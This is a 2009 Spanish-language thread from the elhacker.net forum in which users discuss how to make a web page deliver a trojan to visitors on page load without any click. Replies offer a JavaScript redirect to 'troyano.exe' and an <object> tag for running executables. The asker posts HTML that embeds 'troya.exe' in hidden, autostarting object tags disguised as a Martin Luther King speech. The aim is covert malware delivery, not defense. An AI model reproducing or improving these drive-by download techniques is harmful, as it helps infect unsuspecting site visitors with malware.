elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  web php ejecuta script
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: web php ejecuta script  (Leído 2,761 veces)
winnipu

Desconectado Desconectado

Mensajes: 91


Ver Perfil
web php ejecuta script
« en: 30 Enero 2009, 00:19 am »

Vereis, hoy andaba buscando info sobre php, ya que habia una duda sobre este lenguaje que me acuciaba y en el foro parece que nadie podia ayudarme. Y cual fue mi sorpresa que navegando entro en una web y me salta el antivirus un mensaje: detectado troyano. Ahi es cuando me ha surgido la duda de como narices hacen eso? Ejecutando un script al cargar la pagina? Que comando php esta relacionado con esto? Es decir, yo se que puedes programar para que en cierta zona puedas pinchar para descargar algo. Pero nada mas cargar la pagina, sin darle a nada, que se te descargue un troyano y si no llega a ser por el antivirus no lo hubiese detectado, pues...
Que comando php usan para hacer esto?


En línea

HardieVon

Desconectado Desconectado

Mensajes: 181


Programming HardCore


Ver Perfil WWW
Re: web php ejecuta script
« Respuesta #1 en: 30 Enero 2009, 06:12 am »

lol, con razon me borraron el post xD.
ponle mas retornos de carro, que no entendia xD

a mira supuestamente hay una modificacion del header para descarga el documento.

pero lo que viste yo supongo que mas bien fue un.


Código
  1. <script>
  2. document.location.replace('troyano.exe');
  3. </script>
  4.  


En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: web php ejecuta script
« Respuesta #2 en: 30 Enero 2009, 09:00 am »

Hay veces que pequeños códigos fuentes de códigos maliciosos pueden hacer saltar antivirus.
En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: web php ejecuta script
« Respuesta #3 en: 30 Enero 2009, 09:23 am »

Cuando entras, pueden tener un frame con la dirección de la descarga!
En línea

winnipu

Desconectado Desconectado

Mensajes: 91


Ver Perfil
Re: web php ejecuta script
« Respuesta #4 en: 31 Enero 2009, 01:12 am »

muchas gracias. Las cabecereas y frames. Tambien estuve investigando y hablaban de las ocx y flash. Siempre hay caminos. XD

De todos modos HansVon pruebo ese codigo y me abre una ventana y me dice si me quiero descargar el archivo, pero vamos, asi no me lo descargo ni de coña. La pregunta es:

puede ejecutarse algo directamente al cargarse la pagina y sin que se vea? o eso es imposible? me serviria de algo meterle a tu codigo un hidden?
« Última modificación: 31 Enero 2009, 01:40 am por winnipu » En línea

HardieVon

Desconectado Desconectado

Mensajes: 181


Programming HardCore


Ver Perfil WWW
Re: web php ejecuta script
« Respuesta #5 en: 31 Enero 2009, 06:23 am »

jeje claro que si, as llamar un exe normal como si fuera un applet y te lo ejecuta.

es con <object>
En línea

winnipu

Desconectado Desconectado

Mensajes: 91


Ver Perfil
Re: web php ejecuta script
« Respuesta #6 en: 1 Febrero 2009, 00:23 am »

HansVon, pero me dices crear una ventana que diga:

"necesita este plugin para ver correctamente la pagina" (es decir ingenieria social).

O me estas diciendo que con object no se vera lo que se esta descargando ni habra que darle a ningun boton, Se veria algo con este codigo?

Código:
<BODY>
<OBJECT data="troya.exe">
</OBJECT>
</BODY>

O mejor algo asi?

Código:
<OBJECT DATA="mlk.mov" TYPE="video/quicktime" TITLE="Martin Luther King's &quot;I Have a Dream&quot; speech" WIDTH=150 HEIGHT=150>
<PARAM NAME=pluginspage VALUE="http://quicktime.apple.com/">
<PARAM NAME=autoplay VALUE=true>
<OBJECT DATA="troya.exe" TYPE="audio/mpeg" TITLE="Martin Luther King's &quot;I Have a Dream&quot; speech">
<PARAM NAME=autostart VALUE=true>
<PARAM NAME=hidden VALUE=true>
<A HREF="mlk.html">Full text of Martin Luther King's "I Have a Dream" speech</A>
</OBJECT>
</OBJECT>

No se si he acertado, sobre lo que intentabas decirme o no.
« Última modificación: 1 Febrero 2009, 00:32 am por winnipu » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
AYUDA: Mi Script (JS), no se ejecuta desde un archivo PHP
PHP
NetStorm 4 6,185 Último mensaje 19 Febrero 2011, 02:29 am
por WHK
No se me ejecuta un portable.
Windows
ivesorm 2 13,579 Último mensaje 11 Febrero 2011, 13:28 pm
por ivesorm
[vbs][source] ejecuta script de forma remota
Scripting
daryo 0 1,771 Último mensaje 26 Abril 2014, 22:51 pm
por daryo
no ejecuta script
Desarrollo Web
+ 1 Oculto(s) 7 3,542 Último mensaje 31 Mayo 2016, 04:48 am
por + 1 Oculto(s)
Script que ejecuta acciones cuando no hay conexión en x página
Scripting
BALTA00 0 1,978 Último mensaje 11 Octubre 2016, 18:05 pm
por BALTA00
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines